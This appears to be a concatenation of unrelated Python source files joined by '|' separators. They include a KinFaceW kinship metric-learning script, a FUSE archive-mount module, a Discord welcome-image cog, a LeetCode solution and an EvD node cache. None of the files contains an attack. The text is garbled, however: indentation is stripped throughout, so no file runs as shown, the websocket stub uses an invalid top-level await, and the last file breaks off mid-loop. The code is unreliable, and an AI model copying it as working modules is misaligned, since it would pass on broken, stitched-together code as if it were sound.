KinSet=sys.argv[2]
# Set KinFaceW kinship type from Command line Prompt
KinShip=sys.argv[3]
# Set number of LFL features from Command line Prompt
Q=int(sys.argv[1])
# Display Number of LFL features in the consol
print("Q:",Q)
# Maximum number of Training Epochs
MAX_EPOCH=1000
# Number of Training Epochs between convergence checks
ValidCh=1
# Threshold of difference between last and current test loss (used to detect
# algorithm convergence: check if no further optimization is significant)
ValidTh=0.0001
# Number of Training Trials for this number of features: The program will run
# the training this number of times and returns best performance
nTrial=1
# Best-Threshold-Search step: After learning the feature matrix with this Number
# of features, we must judge its performance on test data in order to find the
# best number of features.
# The best feature matrix (best number of feautres) is the one that seperate
# the two classes (positive/negative) the best, i.e: a threshold on distances
# that best seperate positive and negative pairs must be found an then the
# Accuracy of this threshold is outputed as the performance of this number of
# features.
# The number of features with the best performance will be choosen
SearchT=1000
# Range of initial random values of the feature extraction matrix
MinRand=-0.01
MaxRand=+0.01
# Learning Rate for the Gradient Descent algorithm
LR=0.01
# used to detect convergence
MaxFail=5
#Number of Folds for K-Fold-Cross-Validation
nFold=5
# returns a random value in the predefined range for the matrix initial values
def RandomVal():
return rd.random()*(MaxRand-MinRand)+MinRand
# Returns the best threshold for this feature matrix
# D: List of distances of all pairs
# K: Kinship class (positive/negative) of all pairs (same order as D)
# N: Number pairs (for D and K)
def ThreshPerf(D,K,N):
# Compute Minimum and Maximum distances
MinD=D[0] # Minimum
MaxD=D[0] # Maximum
for i in range(N):
if D[i]<MinD:
MinD=D[i]
if D[i]>MaxD:
MaxD=D[i]
# The algorithm will Compute the performances of 'SearchT' thresholds
# These 'SearchT' thresholds are values in the range [MinD .. MaxD]
Th0=MinD # The best threshold lowor bound
Th1=MinD # The best threshold upper bound
# Since All threshold in the range [Th0 .. Th1] will have the same (best)
# performance, the algorithm will return the mean value of these two bounds
# as best threshold
Perf=0 # Holds the best performance
# Search a number (equal to 'SearchT') of thresholds
for T in range(SearchT):
# Pick a threshold between Minimum and Maximum distances
ThisTh=MinD+T*(MaxD-MinD)/SearchT
# Compute the Accuracy (performance) of this threshold
ThisPerf=0
for i in range(N):
if D[i]<ThisTh:
O=1
else:
O=0
if O==K[i]:
ThisPerf=ThisPerf+1
# See if the current performance is better than the last best
if ThisPerf>Perf:
# If this is a new best then
# 1. Update the best performance value
# 2. initialize Th0 and Th1 to be equal to the current threshold
Th0=ThisTh
Th1=ThisTh
Perf=ThisPerf
# While the performance of the last and current threshold are the same
# Th1 (upper bound of best threshold) will be updateed with greater
# values of threshold
if ThisPerf==Perf:
Th1=ThisTh
# We will return the average of Th0 and Th1 (bounds of best threshold) as
# the threshold with best performance using this number of feautres
Th=(Th0+Th1)/2
return (Th,Perf)
#Training interactive Display Variable
Text=""
# Prepare the file in which we hold results per number of features (Q)
# Each one of the for sub-sets of each one of the two Kinship datasets will
# have its own file of results
# Extension CSV: opens with MS-Excel, LiberOffice ...
csvr=open("./Results_"+KinShip+"_%d"%(Q)+".csv","w")
csvr.write("Fold;Trial;Epochs;Train Loss;Test Loss;Train Accuracy;Test Accuracy\n")
csvr.close()
# K-Cross Validation Results
# Item 1: Average Number of Iterations (Epochs)
# Item 2: Average Training Loss
# Item 3: Average Test Loss
# Item 4: Average Training Accuracy
# Item 5: Average Test Accuracy
Mean=[0.0,0.0,0.0,0.0,0.0]
for Fold in range(1,nFold+1):
# This Fold's best results over 'nTrial' number of trials
# Item 1: Number of Iterations (Epochs)
# Item 2: Training Loss
# Item 3: Test Loss
# Item 4: Training Accuracy
# Item 5: Test Accuracy
Best=[0.0,0.0,0.0,0.0,0.0]
# Loads the Train/Test pairs of this fold
# Inputs:
# KinSet: KinFaceW dataset (KinFaceW-I or KinFaceW-II)
# Kinship: KinFaceW subset (fs, fd, ms or md)
# Fold: K-Fold-Cross-Validation's fold
# Outputs:
# P0: Gray-Scale images of parents (Training data)
# C0: Gray-Scale images of children (Training data)
# K0: Kinship label (positive/negative) (Training data)
# P1: Gray-Scale images of parents (Test data)
# C1: Gray-Scale images of children (Test data)
# K1: Kinship label (positive/negative) (Test data)
(P0,C0,K0,P1,C1,K1)=LoadFold(KinSet,KinShip,Fold)
# N0: Number of train pairs
# a: 1
# M0: Number of gray-scale pixels in each image
(N0,a,M0)=P0.shape
# N1: Number of test pairs
# b: 1
# M1: Number of gray-scale pixels in each image
(N1,b,M1)=P1.shape
# Difference between gray-scale images of a pair (parent/child)
D0=P0-C0
D1=P1-C1
# Try 'nTrail' times and return best results in 'Best' list
for TR in range(nTrial):
# Initialize a Tensorflow session
ss=tf.Session()
# Make the initial random feature matrix
A0=[]
for i in range(M0):
Z=[]
for j in range(Q):
Z.append(RandomVal())
A0.append(Z)
# Use GPU for this Computation
with tf.device("/gpu:0"):
# A Tensor that holds the list of vectors of differences between
# gray-scale images of (parent,child) pairs [(P1-C1),(P2-C2),...,(Pn-Cn)]
D = tf.placeholder(tf.float32,shape=(None,1,None))
# A Tensor that holds kinship classes (positive/negative)
T = tf.placeholder(tf.float32,shape=(None,))
# A Tensor that holds the number of pairs
L = tf.placeholder(dtype=tf.int32)
# A Tensor Variable that contains the feature metric's matrix
A = tf.Variable(A0,dtype=tf.float32)
# A tensorflow's Variables' initializer
init = tf.global_variables_initializer()
# Gradient Descent's Loss function definition
# Tensorflow's While Loop continuation condition
def cond(i, others):
return i < L
# Tensorflow's While Loop body
def body(i, s):
# i^th pair's gray-scale-difference
x = D[i]
# i^th pair's KinShip class
t = T[i]
# multiply the gray-scale-difference by feature matrix A
# ~ Equivalent to P[i]*A-C[i]*A
T1 = tf.matmul(x,A)
# Element-wise square of x*A
T3 = tf.square(T1)
# Overall sum of squared differences after multiplication by
# the feature matrix (Equivalent to square of euclidian distance
# between images of a signle pair that were transformed by matrix A)
d = tf.reduce_sum(T3)
# if this is a positive pair then
# add d to the loss value, distance between images of a
# positive pair should be small, so bigger distance means
# more loss
# if this is a negative pair then
# add 1/d to the loss value, distance between images of a
# negative pair should be big, so bigger distance means
# less loss
return i + 1, s+(1-t)/d+t*d
# Makes a Tensorflow's while loop for the loss function's definition
loop = tf.while_loop(cond, body, (tf.constant(0),tf.constant(0.0,shape=(),dtype=tf.float32)))
# The Loss is defined as the mean of signle pairs losses
loss = loop[1]/tf.cast(L, tf.float32)
# Creates a Tensorflow's Gradient Descent Optimizer
optimizer = tf.train.GradientDescentOptimizer(LR)
# Makes a Tensorflow's Gradient Descent Training process
train = optimizer.minimize(loss)
# Runs the Variable initializer on this session
ss.run(init)
# Training
# Last Epoch's loss on test data
LastLoss=ss.run(loss,{D: D1, T:K1, L:N1})
# Epochs' counter
E=0
# Stop boolean
stop=0
# Convergence counter
nFail=0
# While not reached Maximum number of Epochs and stop is false
while(E<MAX_EPOCH)and(stop==0):
# Runs a single training epoch
ss.run(train, {D: D0, T:K0, L:N0})
# Computes losses after this epoch
TrainLoss=ss.run(loss,{D: D0, T:K0, L:N0})
TestLoss=ss.run(loss,{D: D1, T:K1, L:N1})
# Difference between Last Epoch's loss and current loss on test data
Diff=LastLoss-TestLoss
# Clear consol, this won't work properly on idle, better run
# this script for cmd (shell)
os.system("cls")
# Show old training results
print(Text)
# show this epoch's training progress
print('Q: %d Epoch: %d[%d]'%(Q,Fold,TR+1),E+1,'/',MAX_EPOCH,TrainLoss,":",TestLoss,"[",Diff,"]")
# Check for convergence, if the Difference between Last Epoch's
# loss and current loss on test data is less than a low value
# then stop the algorithm, because, it is of no use to go further
if (E+1)%ValidCh==0:
if Diff<ValidTh:
nFail=nFail+1
if nFail>=MaxFail:
stop=1
# Update last loss value
LastLoss=TestLoss
# Increment epoch's counter
E=E+1
# Results
# M: Learned feature metric's matrix
# L: Learning Loss
M, L = ss.run([A, loss], {D: D0, T:K0, L:N0})
# Search best threshold
# d0: distances after multiplication by the feature extraction matrix
# (Training data)
d0=[]
for i in range(N0):
Z=np.matmul(P0[i],M)
W=np.matmul(C0[i],M)
d0.append(np.linalg.norm(Z-W))
# d1: distances after multiplication by the feature extraction matrix
# (Test data)
d1=[]
for i in range(N1):
Z=np.matmul(P1[i],M)
W=np.matmul(C1[i],M)
d1.append(np.linalg.norm(Z-W))
# Results
# Th0: Best threshold using training data
# Perf0: Performance of the best threshold using training data
(Th0,Perf0)=ThreshPerf(d0,K0,N0)
# Th1: Best threshold using test data
# Perf1: Performance of the best threshold using test data
(Th1,Perf1)=ThreshPerf(d1,K1,N1)
# If the best test performance (in which we are interested) for this
# trial is better than the last one, then updated best results of this
# fold and save the feature-extraction matrix Learned from this fold
if(Perf1>Best[4]):
Best[0]=E
Best[1]=TrainLoss
Best[2]=TestLoss
Best[3]=Perf0
Best[4]=Perf1
if KinSet=="KinFaceW-I":
FileNameM="./M_"+KinShip+"-I_%d"%(Fold)+".csv"
else:
FileNameM="./M_"+KinShip+"-II_%d"%(Fold)+".csv"
SaveToCSV(M,FileNameM)
# Terminate the Tensorflow's session created earlier
ss.close()
# Output results to result's csv file
csvr=open("./Results_"+KinShip+"_%d"%(Q)+".csv","a")
csvr.write("%d;%d;%d;%f;%f;%f;%f\n"%(Fold+1,TR,E,TrainLoss,TestLoss,Perf0,Perf1))
csvr.close()
# Let the GPU rest for 20 seconds, just for the sake of hardware :p
time.sleep(20)
# K-Fold-Cross-Validation Results (Sum)
Mean[0]=Mean[0]+Best[0]
Mean[1]=Mean[1]+Best[1]
Mean[2]=Mean[2]+Best[2]
Mean[3]=Mean[3]+(Best[3]*100/N0)
Mean[4]=Mean[4]+(Best[4]*100/N1)
# K-Fold-Cross-Validation Results (Average)
for i in range(5):
Mean[i]=Mean[i]/nFold
# Make a new line on the training interactive Display Variable
# Why this technique?
# if you run multiple times this script from a shell batch file with different
# number of features (as i do), this program will always output in the consol
# final results of older execusions (other number of features), and it will
# output the results of the last iteration for the current execusion (current
# number of features)
# The variable 'Text' holds older execusions' results, to output them before
# the current results
Text=Text+"%4d : %4d : %.03f : %.03f : %.01f%% : %.01f%%\n"%(Q,Mean[0],Mean[1],Mean[2],Mean[3],Mean[4])
Line="%d;%f;%f;%f;%f;%f\n"%(Q,Mean[0],Mean[1],Mean[2],Mean[3],Mean[4])
csvr=open("./Results.csv","a")
csvr.write(Line)
csvr.close()
print(Text)
|
import errno
import io
import os
import stat
import tempfile
import time
from collections import defaultdict
from signal import SIGINT
from distutils.version import LooseVersion
from zlib import adler32
import llfuse
import msgpack
from .logger import create_logger
logger = create_logger()
from .archive import Archive
from .helpers import daemonize
from .item import Item
from .lrucache import LRUCache
# Does this version of llfuse support ns precision?
have_fuse_xtime_ns = hasattr(llfuse.EntryAttributes, 'st_mtime_ns')
fuse_version = LooseVersion(getattr(llfuse, '__version__', '0.1'))
if fuse_version >= '0.42':
def fuse_main():
return llfuse.main(workers=1)
else:
def fuse_main():
llfuse.main(single=True)
return None
class ItemCache:
def __init__(self):
self.fd = tempfile.TemporaryFile(prefix='borg-tmp')
self.offset = 1000000
def add(self, item):
pos = self.fd.seek(0, io.SEEK_END)
self.fd.write(msgpack.packb(item.as_dict()))
return pos + self.offset
def get(self, inode):
offset = inode - self.offset
if offset < 0:
raise ValueError('ItemCache.get() called with an invalid inode number')
self.fd.seek(offset, io.SEEK_SET)
item = next(msgpack.Unpacker(self.fd, read_size=1024))
return Item(internal_dict=item)
class FuseOperations(llfuse.Operations):
"""Export archive as a fuse filesystem
"""
# mount options
allow_damaged_files = False
versions = False
def __init__(self, key, repository, manifest, args, cached_repo):
super().__init__()
self.repository_uncached = repository
self.repository = cached_repo
self.args = args
self.manifest = manifest
self.key = key
self._inode_count = 0
self.items = {}
self.parent = {}
self.contents = defaultdict(dict)
self.default_dir = Item(mode=0o40755, mtime=int(time.time() * 1e9), uid=os.getuid(), gid=os.getgid())
self.pending_archives = {}
self.accounted_chunks = {}
self.cache = ItemCache()
data_cache_capacity = int(os.environ.get('BORG_MOUNT_DATA_CACHE_ENTRIES', os.cpu_count() or 1))
logger.debug('mount data cache capacity: %d chunks', data_cache_capacity)
self.data_cache = LRUCache(capacity=data_cache_capacity, dispose=lambda _: None)
def _create_filesystem(self):
self._create_dir(parent=1) # first call, create root dir (inode == 1)
if self.args.location.archive:
archive = Archive(self.repository_uncached, self.key, self.manifest, self.args.location.archive,
consider_part_files=self.args.consider_part_files)
self.process_archive(archive)
else:
archive_names = (x.name for x in self.manifest.archives.list_considering(self.args))
for name in archive_names:
archive = Archive(self.repository_uncached, self.key, self.manifest, name,
consider_part_files=self.args.consider_part_files)
if self.versions:
# process archives immediately
self.process_archive(archive)
else:
# lazy load archives, create archive placeholder inode
archive_inode = self._create_dir(parent=1)
self.contents[1][os.fsencode(name)] = archive_inode
self.pending_archives[archive_inode] = archive
def mount(self, mountpoint, mount_options, foreground=False):
"""Mount filesystem on *mountpoint* with *mount_options*."""
options = ['fsname=borgfs', 'ro']
if mount_options:
options.extend(mount_options.split(','))
try:
options.remove('allow_damaged_files')
self.allow_damaged_files = True
except ValueError:
pass
try:
options.remove('versions')
self.versions = True
except ValueError:
pass
self._create_filesystem()
llfuse.init(self, mountpoint, options)
if not foreground:
daemonize()
# If the file system crashes, we do not want to umount because in that
# case the mountpoint suddenly appears to become empty. This can have
# nasty consequences, imagine the user has e.g. an active rsync mirror
# job - seeing the mountpoint empty, rsync would delete everything in the
# mirror.
umount = False
try:
signal = fuse_main()
# no crash and no signal (or it's ^C and we're in the foreground) -> umount request
umount = (signal is None or (signal == SIGINT and foreground))
finally:
llfuse.close(umount)
def _create_dir(self, parent):
"""Create directory
"""
ino = self.allocate_inode()
self.items[ino] = self.default_dir
self.parent[ino] = parent
return ino
def process_archive(self, archive, prefix=[]):
"""Build fuse inode hierarchy from archive metadata
"""
self.file_versions = {} # for versions mode: original path -> version
unpacker = msgpack.Unpacker()
for key, chunk in zip(archive.metadata.items, self.repository.get_many(archive.metadata.items)):
_, data = self.key.decrypt(key, chunk)
unpacker.feed(data)
for item in unpacker:
item = Item(internal_dict=item)
path = os.fsencode(os.path.normpath(item.path))
is_dir = stat.S_ISDIR(item.mode)
if is_dir:
try:
# This can happen if an archive was created with a command line like
# $ borg create ... dir1/file dir1
# In this case the code below will have created a default_dir inode for dir1 already.
inode = self._find_inode(path, prefix)
except KeyError:
pass
else:
self.items[inode] = item
continue
segments = prefix + path.split(b'/')
parent = 1
for segment in segments[:-1]:
parent = self.process_inner(segment, parent)
self.process_leaf(segments[-1], item, parent, prefix, is_dir)
def process_leaf(self, name, item, parent, prefix, is_dir):
def file_version(item):
if 'chunks' in item:
ident = 0
for chunkid, _, _ in item.chunks:
ident = adler32(chunkid, ident)
return ident
def make_versioned_name(name, version, add_dir=False):
if add_dir:
# add intermediate directory with same name as filename
path_fname = name.rsplit(b'/', 1)
name += b'/' + path_fname[-1]
return name + os.fsencode('.%08x' % version)
if self.versions and not is_dir:
parent = self.process_inner(name, parent)
version = file_version(item)
if version is not None:
# regular file, with contents - maybe a hardlink master
name = make_versioned_name(name, version)
path = os.fsencode(os.path.normpath(item.path))
self.file_versions[path] = version
path = item.path
del item.path # safe some space
if 'source' in item and stat.S_ISREG(item.mode):
# a hardlink, no contents, <source> is the hardlink master
source = os.fsencode(os.path.normpath(item.source))
if self.versions:
# adjust source name with version
version = self.file_versions[source]
source = make_versioned_name(source, version, add_dir=True)
name = make_versioned_name(name, version)
try:
inode = self._find_inode(source, prefix)
except KeyError:
logger.warning('Skipping broken hard link: %s -> %s', path, item.source)
return
item = self.cache.get(inode)
item.nlink = item.get('nlink', 1) + 1
self.items[inode] = item
else:
inode = self.cache.add(item)
self.parent[inode] = parent
if name:
self.contents[parent][name] = inode
def process_inner(self, name, parent_inode):
dir = self.contents[parent_inode]
if name in dir:
inode = dir[name]
else:
inode = self._create_dir(parent_inode)
if name:
dir[name] = inode
return inode
def allocate_inode(self):
self._inode_count += 1
return self._inode_count
def statfs(self, ctx=None):
stat_ = llfuse.StatvfsData()
stat_.f_bsize = 512
stat_.f_frsize = 512
stat_.f_blocks = 0
stat_.f_bfree = 0
stat_.f_bavail = 0
stat_.f_files = 0
stat_.f_ffree = 0
stat_.f_favail = 0
return stat_
def get_item(self, inode):
try:
return self.items[inode]
except KeyError:
return self.cache.get(inode)
def _find_inode(self, path, prefix=[]):
segments = prefix + path.split(b'/')
inode = 1
for segment in segments:
inode = self.contents[inode][segment]
return inode
def getattr(self, inode, ctx=None):
item = self.get_item(inode)
size = 0
dsize = 0
if 'chunks' in item:
for key, chunksize, _ in item.chunks:
size += chunksize
if self.accounted_chunks.get(key, inode) == inode:
self.accounted_chunks[key] = inode
dsize += chunksize
entry = llfuse.EntryAttributes()
entry.st_ino = inode
entry.generation = 0
entry.entry_timeout = 300
entry.attr_timeout = 300
entry.st_mode = item.mode
entry.st_nlink = item.get('nlink', 1)
entry.st_uid = item.uid
entry.st_gid = item.gid
entry.st_rdev = item.get('rdev', 0)
entry.st_size = size
entry.st_blksize = 512
entry.st_blocks = dsize / 512
# note: older archives only have mtime (not atime nor ctime)
mtime_ns = item.mtime
if have_fuse_xtime_ns:
entry.st_mtime_ns = mtime_ns
entry.st_atime_ns = item.get('atime', mtime_ns)
entry.st_ctime_ns = item.get('ctime', mtime_ns)
else:
entry.st_mtime = mtime_ns / 1e9
entry.st_atime = item.get('atime', mtime_ns) / 1e9
entry.st_ctime = item.get('ctime', mtime_ns) / 1e9
return entry
def listxattr(self, inode, ctx=None):
item = self.get_item(inode)
return item.get('xattrs', {}).keys()
def getxattr(self, inode, name, ctx=None):
item = self.get_item(inode)
try:
return item.get('xattrs', {})[name]
except KeyError:
raise llfuse.FUSEError(llfuse.ENOATTR) from None
def _load_pending_archive(self, inode):
# Check if this is an archive we need to load
archive = self.pending_archives.pop(inode, None)
if archive:
self.process_archive(archive, [os.fsencode(archive.name)])
def lookup(self, parent_inode, name, ctx=None):
self._load_pending_archive(parent_inode)
if name == b'.':
inode = parent_inode
elif name == b'..':
inode = self.parent[parent_inode]
else:
inode = self.contents[parent_inode].get(name)
if not inode:
raise llfuse.FUSEError(errno.ENOENT)
return self.getattr(inode)
def open(self, inode, flags, ctx=None):
if not self.allow_damaged_files:
item = self.get_item(inode)
if 'chunks_healthy' in item:
# Processed archive items don't carry the path anymore; for converting the inode
# to the path we'd either have to store the inverse of the current structure,
# or search the entire archive. So we just don't print it. It's easy to correlate anyway.
logger.warning('File has damaged (all-zero) chunks. Try running borg check --repair. '
'Mount with allow_damaged_files to read damaged files.')
raise llfuse.FUSEError(errno.EIO)
return inode
def opendir(self, inode, ctx=None):
self._load_pending_archive(inode)
return inode
def read(self, fh, offset, size):
parts = []
item = self.get_item(fh)
for id, s, csize in item.chunks:
if s < offset:
offset -= s
continue
n = min(size, s - offset)
if id in self.data_cache:
data = self.data_cache[id]
if offset + n == len(data):
# evict fully read chunk from cache
del self.data_cache[id]
else:
_, data = self.key.decrypt(id, self.repository.get(id))
if offset + n < len(data):
# chunk was only partially read, cache it
self.data_cache[id] = data
parts.append(data[offset:offset + n])
offset = 0
size -= n
if not size:
break
return b''.join(parts)
def readdir(self, fh, off):
entries = [(b'.', fh), (b'..', self.parent[fh])]
entries.extend(self.contents[fh].items())
for i, (name, inode) in enumerate(entries[off:], off):
yield name, self.getattr(inode), i + 1
def readlink(self, inode, ctx=None):
item = self.get_item(inode)
return os.fsencode(item.source)
|
from ape import plugins
from .providers import EthereumNetworkConfig, EthereumProvider, NetworkConfig
@plugins.register(plugins.Config)
def config_class():
return NetworkConfig
@plugins.register(plugins.ProviderPlugin)
def providers():
for network_name in EthereumNetworkConfig().serialize():
yield "ethereum", network_name, EthereumProvider
|
#!/usr/bin/env python
import asyncio
import websockets
import datetime
import random
class SocketClient:
def __init__(self):
self.socket = websockets.connect('ws://localhost:9000')
# asyncio.get_event_loop().run_until_complete()
async def send(self, message):
await self.socket.send(message)
client = SocketClient()
await client.send("moi")
# async def hello():
# async with websockets.connect('ws://localhost:9000') as websocket:
# while True:
# now = datetime.datetime.utcnow().isoformat() + 'Z'
# await websocket.send(now)
# await asyncio.sleep(random.random() * 3)
# asyncio.get_event_loop().run_until_complete(hello())
# print("Mock bot client started, sending timestamps")
# asyncio.get_event_loop().run_forever()
|
# -*- coding: utf-8 -*-
"""
File Name: maxProduct
Author : jing
Date: 2020/3/25
https://leetcode-cn.com/problems/maximum-product-subarray/
乘积最大子数组
"""
class Solution:
# 因为负负得正,两个负数可能隔开了,所以需要记录每一个位置的最大值和最小值
def maxProduct(self, nums) -> int:
if nums is None or len(nums) == 0:
return None
elif len(nums) == 1:
return nums[0]
max_dp = nums[:]
min_dp = nums[:]
max_res = max_dp[0]
for i in range(1, len(nums)):
max_dp[i] = max(max_dp[i-1] * nums[i], nums[i], min_dp[i-1] * nums[i])
min_dp[i] = min(min_dp[i-1] * nums[i], nums[i], max_dp[i-1] * nums[i])
max_res = max(max_dp[i], max_res)
return max_res
|
# -*- coding: utf-8 -*-
# @Date : 2022/4/19 09:41
# @Author : WangYihao
# @File : utils.py
import torch
def adaptive_softmax(scores, normalize):
negative_mask = scores < 0
scores = scores.__abs__().float()
if normalize:
scores /= scores.max()
weights = torch.softmax(scores, dim=0)
weights[negative_mask] *= -1
return weights
def zoom_to_01(x):
return (x - x.min()) / (x.max() - x.min())
|
from . import detector
from . import scanner
from . import printer
|
from torchvision.transforms import *
from .fancy_pca import *
from .convert import *
from .autoaugment_operators import *
from .autoaugment_policies import *
from .normalize import *
from .common import *
from .resize_before_crop import *
def get(name, *args, **kwargs):
if name not in locals():
raise RuntimeError('transform [{}] not found in runner.transforms.image')
TransformClass = locals()[name]
transform = TransformClass(*args, **kwargs)
return transform
|
## Copyright 2020 Google LLC
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## https://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""Compatibility-export for `closure_grpc_web_library`."""
load("//bazel/private/rules:closure_grpc_web_library.bzl", _closure_grpc_web_library = "closure_grpc_web_library")
# TODO(yannic): Deprecate and remove.
closure_grpc_web_library = _closure_grpc_web_library
|
from .dataset import BaseDataset
from .dataset import FederatedDataset
from .dataloader import FederatedDataLoader
|
import io
import discord
import PIL as pillow
from discord.ext import commands
from utilities import utils
from utilities import checks
from utilities import converters
from utilities import decorators
HOME = 805638877762420786 # Support Server
WELCOME = 847612677013766164 # Welcome channel
GENERAL = 805638877762420789 # Chatting channel
TESTING = 871900448955727902 # Testing channel
ANNOUNCE = 852361774871216150 # Announcement channel
def setup(bot):
bot.add_cog(Home(bot))
class Home(commands.Cog):
"""
Server specific cog.
"""
def __init__(self, bot):
self.bot = bot
@property
def home(self):
return self.bot.get_guild(HOME)
@property
def welcomer(self):
return self.bot.get_channel(WELCOME)
@property
def booster(self):
return self.bot.get_channel(TESTING)
#####################
## Event Listeners ##
#####################
@commands.Cog.listener()
@decorators.wait_until_ready()
@decorators.event_check(lambda s, m: m.guild.id == HOME)
async def on_member_join(self, member):
if self.bot.tester is False:
await self.welcome(member)
async def welcome(self, member):
byteav = await member.display_avatar.with_size(128).read()
buffer = await self.bot.loop.run_in_executor(
None, self.create_welcome_image, byteav, member
)
dfile = discord.File(fp=buffer, filename="welcome.png")
embed = discord.Embed(
title=f"WELCOME TO {member.guild.name.upper()}!",
description=f"> Click [here]({self.bot.oauth}) to invite {self.bot.user.mention}\n"
f"> Click [here](https://discord.com/channels/{HOME}/{ANNOUNCE}) for announcements.\n"
f"> Click [here](https://discord.com/channels/{HOME}/{GENERAL}) to start chatting.\n"
f"> Click [here](https://discord.com/channels/{HOME}/{TESTING}) to run commands.\n",
timestamp=discord.utils.utcnow(),
color=self.bot.constants.embed,
url=self.bot.oauth,
)
embed.set_thumbnail(url=utils.get_icon(member.guild))
embed.set_image(url="attachment://welcome.png")
embed.set_footer(text=f"Server Population: {member.guild.member_count} ")
await self.welcomer.send(f"{member.mention}", file=dfile, embed=embed)
def create_welcome_image(self, bytes_avatar, member):
banner = pillow.Image.open("./data/assets/banner.png").resize((725, 225))
blue = pillow.Image.open("./data/assets/blue.png")
mask = pillow.Image.open("./data/assets/avatar_mask.png")
avatar = pillow.Image.open(io.BytesIO(bytes_avatar))
try:
composite = pillow.Image.composite(avatar, mask, mask)
except ValueError: # Sometimes the avatar isn't resized properly
avatar = avatar.resize((128, 128))
composite = pillow.Image.composite(avatar, mask, mask)
blue.paste(im=composite, box=(0, 0), mask=composite)
banner.paste(im=blue, box=(40, 45), mask=blue.split()[3])
text = "{}\nWelcome to {}".format(str(member), member.guild.name)
draw = pillow.ImageDraw.Draw(banner)
font = pillow.ImageFont.truetype(
"./data/assets/FreeSansBold.ttf", 40, encoding="utf-8"
)
draw.text((190, 60), text, (211, 211, 211), font=font)
buffer = io.BytesIO()
banner.save(buffer, "png") # 'save' function for PIL
buffer.seek(0)
return buffer
async def thank_booster(self, member):
byteav = await member.display_avatar.with_size(128).read()
buffer = await self.bot.loop.run_in_executor(
None, self.create_booster_image, byteav, member
)
dfile = discord.File(fp=buffer, filename="booster.png")
embed = discord.Embed(
title=f"Thank you for boosting!",
# description=f"> Click [here]({self.bot.oauth}) to invite {self.bot.user.mention}\n"
# f"> Click [here](https://discord.com/channels/{HOME}/{ANNOUNCE}) for announcements.\n"
# f"> Click [here](https://discord.com/channels/{HOME}/{GENERAL}) to start chatting.\n"
# f"> Click [here](https://discord.com/channels/{HOME}/{TESTING}) to run commands.\n",
timestamp=discord.utils.utcnow(),
color=self.bot.constants.embed,
url=self.bot.oauth,
)
embed.set_thumbnail(url=utils.get_icon(member.guild))
embed.set_image(url="attachment://booster.png")
embed.set_footer(
text=f"Server Boosts: {member.guild.premium_subscription_count} "
)
await self.booster.send(f"{member.mention}", file=dfile, embed=embed)
def create_booster_image(self, bytes_avatar, member):
banner = pillow.Image.open("./data/assets/roo.png") # .resize((725, 225))
blue = pillow.Image.open("./data/assets/blue.png")
mask = pillow.Image.open("./data/assets/avatar_mask.png")
avatar = pillow.Image.open(io.BytesIO(bytes_avatar))
try:
composite = pillow.Image.composite(avatar, mask, mask)
except ValueError: # Sometimes the avatar isn't resized properly
avatar = avatar.resize((128, 128))
composite = pillow.Image.composite(avatar, mask, mask)
blue.paste(im=composite, box=(0, 0), mask=composite)
banner.paste(im=blue, box=(40, 45), mask=blue.split()[3])
# text = "{}\nWelcome to {}".format(str(member), member.guild.name)
# draw = pillow.ImageDraw.Draw(banner)
# font = pillow.ImageFont.truetype(
# "./data/assets/FreeSansBold.ttf", 40, encoding="utf-8"
# )
# draw.text((190, 60), text, (211, 211, 211), font=font)
buffer = io.BytesIO()
banner.save(buffer, "png") # 'save' function for PIL
buffer.seek(0)
return buffer
@decorators.command(hidden=True, brief="Test the welcome", name="welcome")
@decorators.is_home(HOME)
@checks.has_perms(manage_guild=True)
@checks.bot_has_perms(embed_links=True, attach_files=True)
async def _welcome(self, ctx, user: converters.DiscordMember = None):
user = user or ctx.author
await self.welcome(user)
@decorators.command(hidden=True, brief="Test the boost", name="booster")
@decorators.is_home(HOME)
@checks.has_perms(manage_guild=True)
@checks.bot_has_perms(embed_links=True, attach_files=True)
async def _booster(self, ctx, user: converters.DiscordMember = None):
user = user or ctx.author
await self.thank_booster(user)
|
'''
Provides access to any node within EvD by UUID. This is a flattend structure
that is kept coherent with EvDScript's AST.
All nodes can be accessed without a type hint. Additionally, major types can
be more quickly accessed by supplying their hint.
'''
# Cache is global so that we can keep a UUID list for NodeParser
cacheObj = None
def get_evd_cache_obj():
global cacheObj
if cacheObj == None:
cacheObj = Cache()
return cacheObj
from .data_nodes.trajectory import Trajectory
from .data_nodes.location import Location
from .data_nodes.waypoint import Waypoint
from .data_nodes.thing import Thing
from .data_nodes.trace import Trace
from .data_nodes.machine import Machine
from .data_nodes.thing_type import ThingType
from .data_nodes.regions.region import Region
from .program_nodes.skill import Skill
from .program_nodes.primitive import Primitive
from .environment_nodes.environment_node import EnvironmentNode
from .program import Program
from .context import Context
from .environment import Environment
class Cache(object):
def __init__(self):
self.data = {}
self.instance_table = {
'trajectory': {'class': Trajectory, 'table': {}},
'location': {'class': Location, 'table': {}},
'waypoint': {'class': Waypoint, 'table': {}},
'thing': {'class': Thing, 'table': {}},
'trace': {'class': Trace, 'table': {}},
'machine': {'class': Machine, 'table': {}},
'environment': {'class': Environment, 'table': {}},
'program': {'class': Program, 'table': {}},
'primitive': {'class': Primitive, 'table': {}},
'context': {'class': Context, 'table': {}},
'thing_type': {'class': ThingType, 'table': {}},
'environment_node': {'class': EnvironmentNode, 'table': {}},
'skill': {'class': Skill, 'table': {}},
'region': {'class': Region, 'table': {}}
}
def add(self, uuid, node):
self.data[uuid] = node
for entry in self.instance_table.values():
if isinstance(node,entry['class']):
entry['table'][uuid] = node
def remove(self, uuid):
node = self.data.pop(uuid, None)
for entry in self.instance_table.values():
if isinstance(node,entry['class']):
entry['table'].pop(uuid, None)
def clear(self):
self.data = {}
for entry in self.instance_table.values():
entry['table'] = {}
def get(self, uuid, hint=None):
retVal = None
if hint in self.instance_table.keys() and uuid in self.instance_table[hint]['table'].keys():
retVal = self.instance_table[hint]['table'][uuid]
else:
retVal = self.data[uuid]
return retVal
def set(self, uuid, dct, hint=None):
self.get(uuid,hint).set(dct)
def get_uuids(self, hint=None):
retVal = None
if hint in self.instance_table.keys():
retVal = self.instance_table[hint]['table'].keys()
elif hint == None:
retVal = self.data.keys()
return retVal
def utility_cache_stats(self):
log = {'data': {}}
for n in self.data.values():
if type(n) not in log['data'].keys():
log['data'][type(n)] = 0
log['data'][type(n)] += 1
for key, entry in self.instance_table.items():
